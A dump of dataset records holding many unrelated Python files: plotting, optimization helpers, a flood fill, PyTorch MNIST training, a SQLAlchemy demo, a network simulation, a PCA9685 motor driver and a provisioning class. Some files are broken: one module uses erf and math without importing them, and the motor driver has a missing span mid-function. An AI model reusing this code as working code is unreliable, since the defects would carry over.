time.sleep(0.01)\n# val = self.pipe.recv()\n# self.update(val)\n# except EOFError:\n# break\n#\n# def update(self, value):\n# # append y value\n# self.y_value = np.append(self.y_value, np.mean(value))\n#\n# # increment x sample\n# self.x_sample = np.append(self.x_sample, self.x_sample[-1]+1)\n#\n# # place new data\n# # self.ax.plot(self.x_sample, self.y_value)\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.relim()\n# self.ax.autoscale_view()\n#\n# self.fig.canvas.draw()\n# self.fig.canvas.flush_events()\n#\n# # pyqtgraph\n#\n# from pyqtgraph.Qt import QtGui, QtCore\n#\n# class qtGraph(Process):\n#\n# def __init__(self, childpipe):\n# super().__init__()\n# self.pipe = childpipe\n# self.daemon = True\n#\n# def display(self):\n# # self.win2 = pg.GraphicsWindow(title=\"Basic plotting examples\")\n# # self.win2.resize(1000, 600)\n# # self.win2.setWindowTitle('pyqtgraph example: Plotting')\n# # self.p2 = self.win2.addPlot(title=\"calibration curve\")\n# # self.curve = self.p2.plot(pen='y')\n#\n# self.graphWidget = pg.PlotWidget()\n# self.y_value = []\n# self.x_sample = []\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n#\n# def run(self):\n# self.display()\n# while True:\n# val = self.pipe.recv()\n# self.update(val)\n#\n# def update(self, value):\n# # t = np.arange(0, 3.0, 0.01)\n# # s = np.sin(2 * np.pi * t + value)\n# # self.curve.setData(t, s)xz\n#\n# self.y_value = 
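# The commented-out Graph process above (and the Manager below) hinge on one
# pattern: a daemon child blocking on Pipe.recv() until every send handle is
# closed. A minimal sketch of just that handshake, with no plotting:
from multiprocessing import Pipe, Process

def consumer(conn):
    while True:
        try:
            value = conn.recv()           # blocks until the parent sends
        except EOFError:                  # all send handles closed -> done
            break
        print('received', value)

if __name__ == '__main__':
    parent_end, child_end = Pipe()
    worker = Process(target=consumer, args=(child_end,), daemon=True)
    worker.start()
    child_end.close()                     # drop the parent's copy of that end
    for v in (1, 2, 3):
        parent_end.send(v)
    parent_end.close()                    # triggers EOFError in the child
    worker.join(timeout=2)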
np.append(self.y_value, np.mean(value))\n# self.x_sample = np.append(self.x_sample, len(self.x_sample)+1)\n# # self.x_sample = np.append(self.x_sample, 1)\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n# QtGui.QGuiApplication.processEvents()\n#\n#\n# # manager\n# # only manager has decorated signals\n# # manager will receive constructed graph in its __init__\n# # manager will have decorated function to construct pipes\n# # set the pipe on the class\n# # launch graph updater in process with pipe as argument\n# #\n# # manager will send signal to pipes (or queues) upon pyqtSignals to UPDATE\n#\n#\n# class Manager(VisualizeBase):\n#\n# def __init__(self):\n# super().__init__()\n# self.mother_pipe = None\n# self.child_pipe = None\n#\n# @VisualizeBase.receiver(channel=20)\n# def new_calibration_plot(self, param):\n# self.mother_pipe, self.child_pipe = Pipe()\n# g = Graph(self.child_pipe)\n# # g = qtGraph(self.child_pipe)\n# g.start()\n#\n# @VisualizeBase.receiver(channel=4)\n# def update(self, value):\n# self.mother_pipe.send(value)\n#\n#\n# #===================================================\n#\n#\n# class RecorderCalibrationGraph(Process):\n#\n# def __init__(self):\n# super().__init__()\n#\n# self._child_pipe = None\n# self.daemon = True\n# self._queue = None\n#\n# self.graphWidget = pg.PlotWidget()\n# # self.setCentralWidget(self.graphWidget)\n#\n# self.x_sample = []\n# self.y_value = []\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n#\n# @property\n# def child_pipe(self):\n# return self._child_pipe\n#\n# @child_pipe.setter\n# def child_pipe(self, pipe):\n# self._child_pipe = pipe\n#\n# @property\n# def queue(self):\n# return self._queue\n#\n# @queue.setter\n# def queue(self, q):\n# self._queue = q\n#\n# def run(self):\n# \"\"\"\n# daemon process:\n# \"\"\"\n# # self.show()\n# pass\n# # while True:\n# # val = self.child_pipe.get()\n# # self._update_plot(val)\n#\n# def _update_plot(self, value):\n# self.y_value = np.append(self.y_value, np.mean(value))\n# self.x_sample = np.append(self.x_sample, len(self.x_sample)+1)\n# # self.x_sample = np.append(self.x_sample, 1)\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n# # self.graphWidget.setXRange(len(self.x_sample), 1)\n#\n#\n# class MyQProcess:\n# def __init__(self):\n# self.win2 = pg.GraphicsWindow(title=\"Basic plotting examples\")\n# self.win2.resize(1000, 600)\n# self.win2.setWindowTitle('pyqtgraph example: Plotting')\n# self.p2 = self.win2.addPlot(title=\"calibration curve\")\n# self.curve = self.p2.plot(pen='y')\n# self.process = QProcess()\n# self.setupProcess()\n#\n# def setupProcess(self):\n# # Set the channels\n# self.process.setProcessChannelMode(QProcess.MergedChannels)\n# # Connect the signal readyReadStandardOutput to the slot of the widget\n# # self.process.readyReadStandardOutput.connect(self.readStdOutput)\n# # Run the process with a given command\n# self.process.start(\"df -h\")\n#\n# def __del__(self):\n# # If QApplication is closed attempt to kill the process\n# self.process.terminate()\n# # Wait for Xms and then elevate the situation to terminate\n# if not self.process.waitForFinished(10000):\n# self.process.kill()\n#\n# @pyqtSlot()\n# def readStdOutput(self):\n# # Every time the process has something to output we attach it to the QTextEdit\n# # self.edit.append(str(self.process.readAllStandardOutput()))\n# # self.edit.append(\"PROCESS RECEIVED SIGNAL\")\n# t = np.arange(0, 3.0, 0.01)\n# s = np.sin(2 * np.pi * t)\n# self.curve.setData(t, s)\n#\n#\n# class 
RecorderCalibrationGraphUpdateWindow(VisualizeBase):\n#\n# to_process = pyqtSignal(object)\n#\n# def __init__(self, calib):\n# super().__init__()\n# self.calibration = calib\n# self.parent_pipe = None\n#\n# @VisualizeBase.receiver(channel=20)\n# def new_calibration_plot(self, param):\n# self.p = MyQProcess()\n# self.to_process.connect(self.update)\n# # self.parent_pipe, child_pipe = Pipe()\n# # self.calibration.child_pipe = child_pipe\n# # queue = Queue()\n# # self.calibration.queue = queue\n# # self.calibration.start()\n# # Calibration Graph is a daemon Process\n# # mp = Processor(target=self.calibration.run, args=())\n# # mp.launch()\n# # self.calibration.start()\n#\n# @VisualizeBase.receiver(channel=4)\n# def update(self, value):\n# # send data to pipe\n# # self.parent_pipe.send(value)\n# self.to_process.emit(value)\n","sub_path":"recorder_polscope/recOrder/polscope/visualization/RecorderCalibPlot.py","file_name":"RecorderCalibPlot.py","file_ext":"py","file_size_in_byte":16357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61267958","text":"import numpy as np\nimport pandas as pd\n\n#Helper function for optimize function, to create eligible space levels\ndef createLevels(mergedPreOptCF,increment):\n\n minLevel = mergedPreOptCF.loc[:, 'Lower_Limit'].min()\n maxLevel = mergedPreOptCF.loc[:, 'Upper_Limit'].max()\n Levels = list(np.arange(minLevel, maxLevel + increment, increment))\n if 0.0 not in Levels:\n Levels.append(np.abs(0.0))\n\n print(Levels) #for unit testing\n\n return Levels\n\n# Helper function for createSPUByLevel function, to forecast weighted combination of sales, profit, and units\n# str_cat is the row of the curve-fitting output for an individual store and category\n# variable can take on the values of \"Sales\", \"Profit\", or \"Units\"\ndef forecast(str_cat, space, variable) :\n\n if space < str_cat[\"Scaled_BP_\" + variable]:\n value = space * (str_cat[\"Scaled_Alpha_\" + variable] *(erf((str_cat[\"Scaled_BP_\" + variable] - str_cat[\"Scaled_Shift_\" + variable]) / (math.sqrt(2) * str_cat[\"Scaled_Beta_\" + variable])))/ str_cat[\"Scaled_BP_\" + variable])\n else:\n value = str_cat[\"Scaled_Alpha_\" + variable] * erf((space - str_cat[\"Scaled_Shift_\" + variable]) / (math.sqrt(2) * str_cat[\"Scaled_Beta_\" + variable]))\n\n return value\n\n\n# Helper function for optimize function, to create objective function of SPU by level for Enhanced optimizations\ndef createNegSPUByLevel(Stores, Categories, Levels, curveFittingOutput, enhMetrics):\n\n # Create n-dimensional array to store Estimated SPU by level\n est_neg_spu_by_lev = np.zeros((len(Stores), len(Categories), len(Levels)))\n\n s = \"Sales\"\n p = \"Profit\"\n u = \"Units\"\n\n # Calculate SPU by level\n for (i, Store) in enumerate(Stores):\n for (j, Category) in enumerate(Categories):\n for (k, Level) in enumerate(Levels):\n str_cat = curveFittingOutput.loc[Store, Category]\n est_neg_spu_by_lev[i][j][k] = - ((enhMetrics[s] / 100) * forecast(str_cat, Level, s) + (enhMetrics[p] / 100) * forecast(str_cat, Level, p) + (enhMetrics[u] / 100) * forecast(str_cat, Level, u))\n\n return est_neg_spu_by_lev\n\n# Helper function for optimize function, to create objective function of error by level for Traditional optimizations\ndef createErrorByLevel(Stores, Categories, Levels,cf):\n\n # Create n-dimensional array to store error by level\n error = np.zeros((len(Stores), len(Categories), len(Levels)))\n\n # Calculate error by level\n for (i, Store) in enumerate(Stores):\n 
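        # Walk every (store, category, level) cell, as in the SPU builder
        # above. NB: this module calls erf() and math.sqrt() but never
        # imports them; it needs `import math` and `from math import erf`
        # (or scipy.special.erf) at the top before forecast() will run.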
for (j, Category) in enumerate(Categories):\n for (k, Level) in enumerate(Levels):\n error[i][j][k] = np.absolute(cf.loc[Store, Category][\"Optimal Space\"] - Level)\n# error[i][j][k] = np.absolute(opt_amt[Category].iloc[i] - Level)\n\n return error\n","sub_path":"src/FixtureOptimization/optimizerFunctions.py","file_name":"optimizerFunctions.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"251101865","text":"\"\"\"Island problem.\"\"\"\ndef floodfill(i, j, row, col, island):\n \"\"\"Return 1 if (i, j) and its neighors are part of the island, 0 otherwise.\"\"\"\n count = 0\n if island[i][j] == 1:\n island[i][j] = 2\n eightdirections = [(1, 0), (-1, 0), (0, 1), (0, -1),\n (1, 1), (1, -1), (-1, 1), (-1, -1)]\n newpositions = [(i+x, j+y) for x, y in eightdirections]\n for posx, posy in newpositions:\n if posx in range(0, row) and posy in range(0, col):\n floodfill(posx, posy, row, col, island)\n count = 1\n return count\n \ndef count_island(row, col, island):\n \"\"\"Return total number of islands in the map.\"\"\"\n count = 0\n for i in range(row):\n for j in range(col):\n count = count + floodfill(i, j, row, col, island)\n return count\n \ndef make_matrix():\n \"\"\"Return number of rows, number of columns and matrix of island map.\"\"\"\n row, col = [int(x) for x in input().split()]\n island = [[int(x) for x in input().split()] for _ in range(row)]\n return row, col, island\n \ndef main():\n \"\"\"Get input for map and print number of islands.\"\"\"\n row, col, island = make_matrix()\n print(count_island(row, col, island))\n \nmain()\n","sub_path":"psit/PSIT/island/island.py","file_name":"island.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"89273238","text":"from sklearn import svm, metrics\r\n\r\n##0. 훈련데이터, 테스트데이터 준비\r\ntrain_data = [[0,0],[0,1],[1,0],[1,1]]\r\ntrain_label = [0,1,1,0]\r\ntest_data = [[1, 0], [0, 0]]\r\ntest_label = [1,0]\r\n\r\n#1. Classifier 생성(선택) --> 머신러닝 알고리즘 선택\r\nclf = svm.NuSVC(gamma = \"scale\") # clf는 classifier의 약자\r\n#2. 데이터로 학습 시키기\r\n#clf.fit( [ 훈련데이터 ], [ 정답 ])\r\nclf.fit (train_data, train_label)\r\n#3. 정답률을 확인(신뢰도)\r\nresults = clf.predict(test_data)\r\nscore = metrics.accuracy_score(results, test_label)\r\nprint(\"정답률 :\", score*100, '%')\r\n","sub_path":"강의자료/2019-06-24/Code14-02 머신러닝 scikit-learn 02.py","file_name":"Code14-02 머신러닝 scikit-learn 02.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370832166","text":"#!/usr/bin/env python3\nimport cv2\n#to start camera\ncap=cv2.VideoCapture(0) # 0 for default camera\nwhile cap.isOpened():\n\tstatus,frame=cap.read()\n\t#gray_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n\tcv2.imshow('w',frame) #to add filter frame+50 i.e. 
BGR+50\n\t#cv2.imshow('w1', gray_frame)\n\tif cv2.waitKey(25) & 0xFF == ord('q'):\n\t\tbreak\ncv2.destroyAllWindows()\ncap.release()\n","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"499594735","text":"from knowledge_model import Base, Knowledge\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///knowledge.db')\nBase.metadata.create_all(engine)\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\ndef add_article(topic, name, rating):\n\tarticle_object = Knowledge(\n\t\ttopic=topic,\n\t\tname=name,\n\t\trating=rating)\n\tsession.add(article_object)\n\tsession.commit()\n\nadd_article(\"astronomy\", \"black holes\", 10)\nadd_article(\"weather\", \"rainbow\", 9)\n\ndef query_all_articles():\n\tarticle = session.query(Knowledge).all()\n\treturn article\n# print(query_all_articles())\n\n\ndef query_article_by_topic(topic_name):\n\tarticle = session.query(Knowledge).filter_by(topic=topic_name).first()\n\treturn article\n# print(query_article_by_topic(\"astronomy\"))\n\n\ndef delete_article_by_topic(topic_name):\n\tarticle = session.query(Knowledge).filter_by(topic=topic_name).delete()\n\tsession.commit()\n\n\n# print(query_all_articles())\n\ndef delete_article_by_rating(threshold):\n\t# filter on the model column; the original bare 'rating' was an undefined name\n\tarticle_object = session.query(Knowledge).filter(Knowledge.rating > threshold).delete()\n\tsession.commit()\n\n\n\ndef delete_all_articles():\n\tarticle = session.query(Knowledge).delete()\n\tsession.commit()\n\n# delete_all_articles()\n\n\ndef edit_article_rating(topic, updated_rating):\n\tarticle_object = session.query(Knowledge).filter_by(topic=topic).first()\n\tarticle_object.rating = updated_rating\n\tsession.commit()\n\nedit_article_rating(\"weather\", 10)\nprint(query_all_articles())\ndelete_article_by_rating(10)","sub_path":"exercises/knowledge_databases.py","file_name":"knowledge_databases.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427310441","text":"'''\r\nCreated on Oct 12, 2016\r\n\r\n@author: mwittie\r\n'''\r\nimport network_4 as network\r\nimport link_4 as link\r\nimport threading\r\nfrom time import sleep\r\n\r\n##configuration parameters\r\nrouter_queue_size = 0 #0 means unlimited\r\nsimulation_time = 35 #give the network sufficient time to transfer all packets before quitting\r\n\r\nif __name__ == '__main__':\r\n    object_L = [] #keeps track of objects, so we can kill their threads\r\n\r\n    # part 3 routing tables\r\n    router_a_table = {1:2, 2:3, 3:0, 4:1}\r\n    router_b_table = {1:1, 2:1, 3:0, 4:0}\r\n    router_c_table = {1:1, 2:1, 3:0, 4:0}\r\n    router_d_table = {1:2, 2:3, 3:0, 4:1}\r\n\r\n    # part 3 network nodes\r\n    host_1 = network.Host(1)\r\n    host_2 = network.Host(2)\r\n    host_3 = network.Host(3)\r\n    host_4 = network.Host(4)\r\n    router_a = network.Router(name='A', intf_count=4, table=router_a_table, max_queue_size=router_queue_size)\r\n    router_b = network.Router(name='B', intf_count=2, table=router_b_table, max_queue_size=router_queue_size)\r\n    router_c = network.Router(name='C', intf_count=2, table=router_c_table, max_queue_size=router_queue_size)\r\n    router_d = network.Router(name='D', intf_count=4, table=router_d_table, max_queue_size=router_queue_size)\r\n    object_L.extend([host_1, host_2, host_3, host_4, router_a, router_b, router_c, router_d])\r\n\r\n    #create a Link Layer to keep track of 
links between network nodes\r\n link_layer = link.LinkLayer()\r\n object_L.append(link_layer)\r\n\r\n # part 3 links\r\n # host to router links\r\n link_layer.add_link(link.Link(host_1, 0, router_a, 0, 70))\r\n link_layer.add_link(link.Link(host_2, 0, router_a, 1, 70))\r\n link_layer.add_link(link.Link(router_a, 2, host_1, 0, 70))\r\n link_layer.add_link(link.Link(router_a, 3, host_2, 0, 70))\r\n link_layer.add_link(link.Link(router_d, 0, host_3, 0, 70))\r\n link_layer.add_link(link.Link(router_d, 1, host_4, 0, 70))\r\n link_layer.add_link(link.Link(host_3, 0, router_d, 2, 70))\r\n link_layer.add_link(link.Link(host_4, 0, router_d, 3, 70))\r\n # router to router links\r\n link_layer.add_link(link.Link(router_a, 0, router_b, 0, 70))\r\n link_layer.add_link(link.Link(router_b, 1, router_a, 2, 70))\r\n link_layer.add_link(link.Link(router_a, 1, router_c, 0, 70))\r\n link_layer.add_link(link.Link(router_c, 1, router_a, 3, 70))\r\n link_layer.add_link(link.Link(router_b, 0, router_d, 0, 70))\r\n link_layer.add_link(link.Link(router_d, 2, router_b, 1, 70))\r\n link_layer.add_link(link.Link(router_c, 0, router_d, 1, 70))\r\n link_layer.add_link(link.Link(router_d, 3, router_c, 1, 70))\r\n\r\n # part 3 start objects\r\n thread_L = []\r\n thread_L.append(threading.Thread(name=host_1.__str__(), target=host_1.run))\r\n thread_L.append(threading.Thread(name=host_2.__str__(), target=host_2.run))\r\n thread_L.append(threading.Thread(name=host_3.__str__(), target=host_3.run))\r\n thread_L.append(threading.Thread(name=host_4.__str__(), target=host_4.run))\r\n thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))\r\n thread_L.append(threading.Thread(name=router_b.__str__(), target=router_b.run))\r\n thread_L.append(threading.Thread(name=router_c.__str__(), target=router_c.run))\r\n thread_L.append(threading.Thread(name=router_d.__str__(), target=router_d.run))\r\n\r\n thread_L.append(threading.Thread(name=\"Network\", target=link_layer.run))\r\n\r\n for t in thread_L:\r\n t.start()\r\n\r\n\r\n #create some send events\r\n host_2.udt_send(3, \"Message from host 2, intended to be received by host 3\")\r\n\r\n host_1.udt_send(4, \"Message from host 1, intended to be received by host 4\")\r\n\r\n host_3.udt_send(1, \"Message from host 3, intended to be received by host 1\")\r\n\r\n host_4.udt_send(2, \"Message from host 4, intended to be received by host 2\")\r\n\r\n\r\n # for i in range(3):\r\n # client.udt_send(2, 'Sample data %d' % i)\r\n\r\n\r\n #give the network sufficient time to transfer all packets before quitting\r\n sleep(simulation_time)\r\n\r\n #join all threads\r\n for o in object_L:\r\n o.stop = True\r\n for t in thread_L:\r\n t.join()\r\n\r\n print(\"All simulation threads joined\")\r\n\r\n\r\n\r\n# writes to host periodically\r\n","sub_path":"csci-466-networks/packet-segmentation-and-routing-lab/part4/simulation_4.py","file_name":"simulation_4.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"165417900","text":"#!/home/user/miniconda/envs/pytorch-1.5-cuda-10.1/bin/python\n \nfrom __future__ import print_function\nimport argparse\nimport click\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport random\nimport time\nimport os\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n 
self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.fc1 = nn.Linear(9216, 128)\n self.dropout2 = nn.Dropout2d(0.25)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n\n return output\n\n\ndef train(log_interval, model, device, train_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print(f'Train Epoch: {epoch} [{batch_idx * len(data)}/{len(train_loader.dataset)}'\n f'({100. * batch_idx / len(train_loader):.0f}%)]\\tLoss: {loss.item():.6f}')\n\n\ndef test(model, device, test_loader):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print(f'\\nTest set: Average loss: {test_loss:.4f}, '\n f'Accuracy: {correct}/{len(test_loader.dataset)} ({100. * correct / len(test_loader.dataset):.0f}%)\\n')\n \n\n@click.command()\n@click.option('--seed', type=int, default=0)\n@click.option('--epochs', type=int, default=100)\n@click.option('--no-cuda', type=bool, default=False)\n@click.option('--log-interval', type=int, default=10)\ndef start_training(epochs, no_cuda, seed, log_interval):\n # Set all random seeds and possibly turn of GPU non determinism\n random_seed(seed, True)\n \n # Set GPU settings\n use_cuda = not no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # Load training and testing data\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=64, shuffle=True, **kwargs)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=64, shuffle=True, **kwargs)\n\n # Define model, device and optimizer\n model = Net()\n if torch.cuda.device_count() > 1:\n print(f'Using {torch.cuda.device_count()} GPUs!')\n model = nn.DataParallel(model)\n model.to(device)\n optimizer = optim.Adam(model.parameters())\n # scheduler = StepLR(optimizer, step_size=1, gamma=0.7) decaying LR \n optimizer.step()\n\n # Start training\n gpu_runtime = time.time()\n for epoch in range(1, epochs + 1):\n train(log_interval, model, device, train_loader, optimizer, epoch)\n test(model, device, test_loader)\n # scheduler.step()\n optimizer.step()\n\n print(f'GPU Run Time: {str(time.time() - gpu_runtime)} seconds')\n\n\ndef random_seed(seed, use_cuda):\n os.environ['PYTHONHASHSEED'] = str(seed) # Python general\n np.random.seed(seed) 
\n    random.seed(seed)  # Python random\n    torch.manual_seed(seed)\n    if use_cuda:\n        torch.cuda.manual_seed(seed)\n        torch.cuda.manual_seed_all(seed)  # For multi-GPU\n        torch.backends.cudnn.deterministic = True\n        torch.backends.cudnn.benchmark = False  # Disable the cudnn auto-tuner so runs stay deterministic\n\n\nif __name__ == '__main__':\n    print(f'Num GPUs Available: {torch.cuda.device_count()}')\n\n    start_training()\n","sub_path":"bin/train_mnist_pytorch.py","file_name":"train_mnist_pytorch.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181409378","text":"def counting_sort(arr):\n    ct = [0] * 100\n    for el in arr:\n        ct[el] += 1\n    idx = 0\n    for i in range(len(ct)):\n        for _ in range(ct[i]):\n            arr[idx] = i\n            idx += 1\n    return ' '.join(list(map(str, arr)))\n\ndef solve():\n    input()\n    print(counting_sort([int(i) for i in input().split()]))\n\nif __name__ == '__main__':\n    solve()\n","sub_path":"HackerRank/Algorithms/Sorting/countingsort_pt2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617790934","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.axis([0, 10, 0, 1])\nplt.ion()\nx = []\ny = []\nfor i in range(10):  # was xrange, which only exists in Python 2\n    x.append(i)\n    y.append(np.random.random())\n\nplt.scatter(x, y)\nplt.show()  # keep the window open when run as a script\n","sub_path":"scripts/plots_tutorial.py","file_name":"plots_tutorial.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"110182122","text":"#\n# Based on: https://github.com/adafruit/micropython-adafruit-pca9685/blob/master/LICENSE\n#\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Radomir Dopieralski, written for Adafruit Industries\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom pyb import I2C\nimport ustruct, utime\n\nclass PCA9685:\n def __init__(self, i2c, address=0x40):\n self.i2c = i2c\n self.address = address\n self.reset()\n\n def _write(self, address, value):\n self.i2c.mem_write(bytearray([value]), self.address, address)\n #self.i2c.writeto_mem(self.address, address, bytearray([value]))\n\n def _read(self, address):\n return self.i2c.mem_read(1, self.address, address)[0]\n\n def reset(self):\n self._write(0x00, 0x00) # Mode1\n\n def freq(self, freq=None):\n if freq is None:\n return int(25000000.0 / 4096 / (self._read(0xfe) - 0.5))\n prescale = int(25000000.0 / 4096.0 / freq + 0.5)\n old_mode = self._read(0x00)\n self._write(0x00, (old_mode & 0x7F) | 0x10)\n self._write(0xfe, prescale)\n self._write(0x00, old_mode)\n utime.sleep_us(5)\n self._write(0x00, old_mode | 0xa1)\n\n def pwm(self, index, on=None, off=None):\n if on is None or off is None:\n data = self.i2c.readfrom_mem(self.address, 0x06 + 4 * index, 4)\n return ustruct.unpack(' 0:\n # Forward\n self._pin(in2, False)\n self._pin(in1, True)\n elif value < 0:\n # Backward\n self._pin(in1, False)\n self._pin(in2, True)\n else:\n # Release\n self._pin(in1, False)\n self._pin(in2, False)\n self.pca9685.duty(pwm, abs(value))\n\n def brake(self, index):\n pwm, in2, in1 = _DC_MOTORS[index]\n self._pin(in1, True)\n self._pin(in2, True)\n self.pca9685.duty(pwm, 0)","sub_path":"motors.py","file_name":"motors.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"321611258","text":"\"\"\"\nCopyright (c) 2019 Cypress Semiconductor Corporation\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom cysecuretools.execute.provisioning_lib.cyprov_entity import Entity\nfrom cysecuretools.execute.provisioning_lib.cyprov_crypto import Crypto\nfrom cysecuretools.execute.provisioning_lib.cyprov_types import Types\nfrom datetime import datetime, timedelta\n\n\n# Oem (Customr) Entity\nclass OemEntity(Entity):\n def __init__(self, state_name, audit_name):\n Entity.__init__(self, state_name, audit_name)\n \n def create_entity(self, chain_of_trust=[]):\n \"\"\"\n Creates the Oem entity.\n Creates the Oem main key-pair and returns nothing.\n \"\"\"\n oem_priv_key,oem_pub_key = Crypto.create_jwk()\n self.state[\"oem_priv_key\"] = oem_priv_key\n self.state[\"oem_pub_key\"] = oem_pub_key\n self.state[\"oem_chain_of_trust\"] = chain_of_trust\n \n def create_rot_authorization(self, signing_pkg):\n \"\"\"\n OEM creates a root-of-trust authorization package based on the signing key package from the HSM\n It's a JWT with two main parts:\n - a rot_auth authorization token that is sent to the device\n - a chain of X509 certificates that establishses the OEM's trust in the HSM 
signing key\n Note that this chain is not used inside the device and used only by 3rd parties\n \"\"\"\n oem_pub_key = self.state[\"oem_pub_key\"]\n oem_priv_key = self.state[\"oem_priv_key\"]\n oem_chain_of_trust = self.state[\"oem_chain_of_trust\"]\n \n # get HSM public key and check CY authorization\n signing_pkg_payload = Crypto.jwt_payload(signing_pkg)\n cy_auth = signing_pkg_payload[\"cy_auth\"]\n cy_auth_payload = Crypto.jwt_payload(cy_auth)\n cy_pub_key = cy_auth_payload[\"cy_pub_key\"]\n hsm_pub_key = cy_auth_payload[\"hsm_pub_key\"]\n if not Crypto.validate_jwt(cy_auth, cy_pub_key):\n raise Exception(\"Invalid signature on Cypress HSM authorization in request\")\n if cy_auth_payload[\"type\"] != Types.CY_AUTH_HSM:\n raise Exception(\"Invalid type for Cypress HSM authorization in request\")\n if datetime.fromtimestamp(cy_auth_payload[\"exp\"]) < datetime.now():\n raise Exception(\"Cypress HSM authorization expired\")\n\n # validate HSM request itself\n signing_pub_key = signing_pkg_payload[\"signing_pub_key\"]\n prod_id = signing_pkg_payload[\"prod_id\"]\n if not Crypto.validate_jwt(signing_pkg, hsm_pub_key):\n raise Exception(\"Invalid signature on HSM signing key package\")\n if 